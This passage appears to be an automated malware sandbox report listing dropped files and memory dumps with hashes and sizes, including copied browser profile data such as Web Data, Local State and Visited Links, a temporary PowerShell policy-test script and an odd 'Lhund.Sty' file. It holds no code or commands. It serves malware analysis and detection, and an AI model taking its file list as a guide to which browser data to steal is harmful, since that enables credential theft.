16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Site Characteristics Database\000003.log

Filesize
40B

MD5
148079685e25097536785f4536af014b

SHA1
c5ff5b1b69487a9dd4d244d11bbafa91708c1a41

SHA256
f096bc366a931fba656bdcd77b24af15a5f29fc53281a727c79f82c608ecfab8

SHA512
c2556034ea51abfbc172eb62ff11f5ac45c317f84f39d4b9e3ddbd0190da6ef7fa03fe63631b97ab806430442974a07f8e81b5f7dc52d9f2fcdc669adca8d91f

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Site Characteristics Database\LOG

Filesize
291B

MD5
045c6a20aca6e8e5301807874fa9da7f

SHA1
243bf68d775be9e4b5703782cc93e31e4d567554

SHA256
6e424bb248e0c43775922641418d99c0a5912c73a41716dfe71132c984cbd08c

SHA512
056902d525fbff84c3ab7ca09dc4cc6c83e1c77279ee3f04429385e28e822b6c4c35c21aa6973ee550c5a44759f1ef430b5843c7c2a88797287a1e8d250df3b6

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Site Characteristics Database\MANIFEST-000001

Filesize
41B

MD5
5af87dfd673ba2115e2fcf5cfdb727ab

SHA1
d5b5bbf396dc291274584ef71f444f420b6056f1

SHA256
f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4

SHA512
de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Sync Data\LevelDB\000003.log

Filesize
46B

MD5
90881c9c26f29fca29815a08ba858544

SHA1
06fee974987b91d82c2839a4bb12991fa99e1bdd

SHA256
a2ca52e34b6138624ac2dd20349cde28482143b837db40a7f0fbda023077c26a

SHA512
15f7f8197b4fc46c4c5c2570fb1f6dd73cb125f9ee53dfa67f5a0d944543c5347bdab5cce95e91dd6c948c9023e23c7f9d76cff990e623178c92f8d49150a625

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Sync Data\LevelDB\LOG

Filesize
269B

MD5
3840f24357b8913f0436e27c3e08a83f

SHA1
99efea1365ee6dab206a39bcdee5c5100cbb9e20

SHA256
3fe63a48f92f15a19421ba681b4010a175fa8278156830fa3f5992f077a95078

SHA512
132828e8400b1e29502d7bdc9e9401ff1784aaa936df9dd7a502fea22d3336e507856236efc42ec9dc890d41719fccb28efee4400ed5937bfc11ae9c837e56d3

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Top Sites

Filesize
20KB

MD5
986962efd2be05909f2aaded39b753a6

SHA1
657924eda5b9473c70cc359d06b6ca731f6a1170

SHA256
d5dddbb1fbb6bbf2f59b9d8e4347a31b6915f3529713cd39c0e0096cea4c4889

SHA512
e2f086f59c154ea8a30ca4fa9768a9c2eb29c0dc2fe9a6ed688839853d90a190475a072b6f7435fc4a1b7bc361895086d3071967384a7c366ce77c6771b70308

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Visited Links

Filesize
128KB

MD5
27799ed15f4632b7f215d836b1a2df1f

SHA1
232cd6d935179c099792a532460fdd13d0f818c4

SHA256
3be9aa03f6f11dc25e2683f23f736eea531ba486aab18da4bbaf4d15ff6bed0c

SHA512
43dd5d6b0d7b39b07f2d0a0e3710e209e871e7808ef29db52a0fb9c83afc93ce5dfad8eaac0d3a701a69542a2bb51ab66c6b71a774c4dd13bcbf8c8bd61d70ea

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Web Data

Filesize
114KB

MD5
7db33b8fe1eb450c631c14bb74b64196

SHA1
034900c19ff3fe4b445d492ceb283989eb506a01

SHA256
f62b4159043c5db17740fb90f8ef488430e82c40d77d6655b04955d8e31d861c

SHA512
237542231afece985ef5447ccec1882e9266429a22a1c819c875a8610af0993c976ff50c967d4d9e5d34fd7f310eb1deb09bd912e660e111615657203fcb4dfd

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\shared_proto_db\000003.log

Filesize
4KB

MD5
9d4d274ee6211a7f95d8866937d47c0e

SHA1
67327057cb414db14d0b642ad76e423ce61c4a37

SHA256
01e8d10b4826af983c1316fd00ec69a4c7b996d21f215a23d133374fb3a3114a

SHA512
4beaa01311e1436a87a49c4a76023ffe0f66370c76d1d595161539cd456d905140c046d2cf4d0a05a95c598d83a2a47ccb62db66835855306bd736fb00dd1d1f

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\shared_proto_db\LOG

Filesize
263B

MD5
f3e06260f7deec4a8f1c9f0c6e555511

SHA1
28b1a2df25170c06b10a5890638e4474d6a9968d

SHA256
1439f2131d9cc3f00dac7dc73de3b6a429427767ac835853f9477b5482f3baa2

SHA512
97a282beaa81a7b3d042235c140c2c0db6514d2f997dfb8bf5fb8223c7e49dd9143ed83aa21b3e4f045373330dd7374611151580033937b3688560fb75cc6cd1

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\shared_proto_db\metadata\000003.log

Filesize
682B

MD5
a024ba5187707cddf81f91a1e5fb5b3a

SHA1
e13095a5643aca2f9c80b4102d3fd788befa6d12

SHA256
2665ac41f2d054744928044f2d2b60a1ead598c29e75f4cbaf0ca156de15915d

SHA512
8cb5bffe5c31c18f7aedffce88d4ea00bf70e6e7353c3eec020e536cdabd993eb62fae0e1af2a3329d364e1e487a5e3e6e053d22b054ef80e097b5dda699e577

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\shared_proto_db\metadata\LOG

Filesize
281B

MD5
ebf67511fe51f987960bead47ba441d9

SHA1
ed3075f51b56738d7f4aff25dd5bef2718b3392e

SHA256
199af9a91c1834ae78348b3f377313d961c661e35bf0be631d1732186c96e52d

SHA512
5a1ba71917c2095ce5e8f30225a74d36632b2609fe3cb0ca74880292e8fe90bb78baffd5b8c402f405d1f4d08bf047a157ac5bb92eded2ecf5efbb1c8b5c19a8

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\GraphiteDawnCache\data_0

Filesize
8KB

MD5
cf89d16bb9107c631daabf0c0ee58efb

SHA1
3ae5d3a7cf1f94a56e42f9a58d90a0b9616ae74b

SHA256
d6a5fe39cd672781b256e0e3102f7022635f1d4bb7cfcc90a80fffe4d0f3877e

SHA512
8cb5b059c8105eb91e74a7d5952437aaa1ada89763c5843e7b0f1b93d9ebe15ed40f287c652229291fac02d712cf7ff5ececef276ba0d7ddc35558a3ec3f77b0

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\GraphiteDawnCache\data_2

Filesize
8KB

MD5
0962291d6d367570bee5454721c17e11

SHA1
59d10a893ef321a706a9255176761366115bedcb

SHA256
ec1702806f4cc7c42a82fc2b38e89835fde7c64bb32060e0823c9077ca92efb7

SHA512
f555e961b69e09628eaf9c61f465871e6984cd4d31014f954bb747351dad9cea6d17c1db4bca2c1eb7f187cb5f3c0518748c339c8b43bbd1dbd94aeaa16f58ed

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\GraphiteDawnCache\data_3

Filesize
8KB

MD5
41876349cb12d6db992f1309f22df3f0

SHA1
5cf26b3420fc0302cd0a71e8d029739b8765be27

SHA256
e09f42c398d688dce168570291f1f92d079987deda3099a34adb9e8c0522b30c

SHA512
e9a4fc1f7cb6ae2901f8e02354a92c4aaa7a53c640dcf692db42a27a5acc2a3bfb25a0de0eb08ab53983132016e7d43132ea4292e439bb636aafd53fb6ef907e

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Last Version

Filesize
11B

MD5
838a7b32aefb618130392bc7d006aa2e

SHA1
5159e0f18c9e68f0e75e2239875aa994847b8290

SHA256
ac3dd2221d90b09b795f1f72e72e4860342a4508fe336c4b822476eb25a55eaa

SHA512
9e350f0565cc726f66146838f9cebaaa38dd01892ffab9a45fe4f72e5be5459c0442e99107293a7c6f2412c71f668242c5e5a502124bc57cbf3b6ad8940cb3e9

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Local State

Filesize
8KB

MD5
c587d6567a58e71f60d6c2f204c0c0f0

SHA1
b711e7cd019dd0143e58912c23fb102606de3ae0

SHA256
95a2dbaa9bce6512c7e200ccc6b9c7ed4ac64a1dac362910c7560e84c189cee5

SHA512
44a41155f307e9edbbf33786bc790e6060a6684541d7f2ea7a75de8b2c9e33989d0af011b3eaa1e6ff9d5bc728159ea3d69b9823502e05e5f4fb64d732f22f60

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Local State

Filesize
116KB

MD5
f424ccdb46784c085c96de6552f8fda0

SHA1
b9d8315b3b400667a7860dffe2c644e6bd6145d9

SHA256
0cfa0a1470211707cc8e28f5137d064cfd6e3a2926d3f1a54476f5c90211b0c5

SHA512
4634250b29eb644f9f45e0c1c17a84a4115cc240a2fae3265d16e7b90fedfeae52ccdcad7d4efb026ada04c8c2b00bbeff9baed84f0f7d37b355b41718273ec3

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3ovfufzl.vqg.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\tgtnidaxcghgfnjiv

Filesize
4KB

MD5
16dfb23eaa7972c59c36fcbc0946093b

SHA1
1e9e3ff83a05131575f67e202d352709205f20f8

SHA256
36c49c94327c8cadcad4c0d2b3a8f5162fc7bb86624923484476c5f7b960bc4c

SHA512
a8b38b5e7bf886b78c5c7f01234b44647a252d4dfbcc06c99b863f8e160e3cfc151b2a83b8b49e09d13e8547419467da4bffbb8dee5fc6740032eb7c839d89dc

Download Submit
C:\Users\Admin\AppData\Roaming\Lhund.Sty

Filesize
455KB

MD5
725c341a938e4ae35dae7e8255fb39a2

SHA1
56a52fc5854409155e5025130d102b1c57a8cf38

SHA256
fb26bc96ab1a2525238abe9de62671114645dd08d39675326abc739fd67af0e7

SHA512
f8cab34fefeb0f1fd05c5888e7799b22ce124a802db7084d83addb8c6cb444479d0bde755538b053c8bcdb607f5b6884240f222a46e487c26b48993c60f58711

Download Submit
memory/852-192-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/852-191-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/852-193-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/2276-214-0x0000000023EE0000-0x0000000023EF9000-memory.dmp

Filesize
100KB

Download
memory/2276-73-0x00000000235E0000-0x0000000023614000-memory.dmp

Filesize
208KB

Download
memory/2276-62-0x0000000000F30000-0x0000000002184000-memory.dmp

Filesize
18.3MB

Download
memory/2276-215-0x0000000023EE0000-0x0000000023EF9000-memory.dmp

Filesize
100KB

Download
memory/2276-63-0x0000000000F30000-0x0000000002184000-memory.dmp

Filesize
18.3MB

Download
memory/2276-211-0x0000000023EE0000-0x0000000023EF9000-memory.dmp

Filesize
100KB

Download
memory/2276-69-0x00000000235E0000-0x0000000023614000-memory.dmp

Filesize
208KB

Download
memory/2276-72-0x00000000235E0000-0x0000000023614000-memory.dmp

Filesize
208KB

Download
memory/2784-188-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/2784-189-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/2784-184-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/3880-187-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/3880-183-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/3880-190-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/3880-185-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/4344-49-0x0000000008A00000-0x000000000E0B8000-memory.dmp

Filesize
86.7MB

Download
memory/4344-28-0x00000000057A0000-0x0000000005806000-memory.dmp

Filesize
408KB

Download
memory/4344-47-0x0000000008450000-0x00000000089F4000-memory.dmp

Filesize
5.6MB

Download
memory/4344-46-0x00000000071A0000-0x00000000071C2000-memory.dmp

Filesize
136KB

Download
memory/4344-45-0x0000000007240000-0x00000000072D6000-memory.dmp

Filesize
600KB

Download
memory/4344-44-0x0000000006520000-0x000000000653A000-memory.dmp

Filesize
104KB

Download
memory/4344-43-0x0000000007820000-0x0000000007E9A000-memory.dmp

Filesize
6.5MB

Download
memory/4344-42-0x0000000005FC0000-0x000000000600C000-memory.dmp

Filesize
304KB

Download
memory/4344-41-0x0000000005F80000-0x0000000005F9E000-memory.dmp

Filesize
120KB

Download
memory/4344-39-0x0000000005AB0000-0x0000000005E04000-memory.dmp

Filesize
3.3MB

Download
memory/4344-29-0x0000000005940000-0x00000000059A6000-memory.dmp

Filesize
408KB

Download
memory/4344-25-0x00000000049F0000-0x0000000004A26000-memory.dmp

Filesize
216KB

Download
memory/4344-27-0x0000000005700000-0x0000000005722000-memory.dmp

Filesize
136KB

Download
memory/4344-26-0x0000000005060000-0x0000000005688000-memory.dmp

Filesize
6.2MB

Download
memory/4752-4-0x00007FFB662F3000-0x00007FFB662F5000-memory.dmp

Filesize
8KB

Download
memory/4752-24-0x00007FFB662F0000-0x00007FFB66DB1000-memory.dmp

Filesize
10.8MB

Download
memory/4752-21-0x00007FFB662F0000-0x00007FFB66DB1000-memory.dmp

Filesize
10.8MB

Download
memory/4752-20-0x00007FFB662F0000-0x00007FFB66DB1000-memory.dmp

Filesize
10.8MB

Download
memory/4752-19-0x00007FFB662F3000-0x00007FFB662F5000-memory.dmp

Filesize
8KB

Download
memory/4752-16-0x00007FFB662F0000-0x00007FFB66DB1000-memory.dmp

Filesize
10.8MB

Download
memory/4752-15-0x00007FFB662F0000-0x00007FFB66DB1000-memory.dmp

Filesize
10.8MB

Download
memory/4752-11-0x000001B9684B0000-0x000001B9684D2000-memory.dmp

Filesize
136KB

Download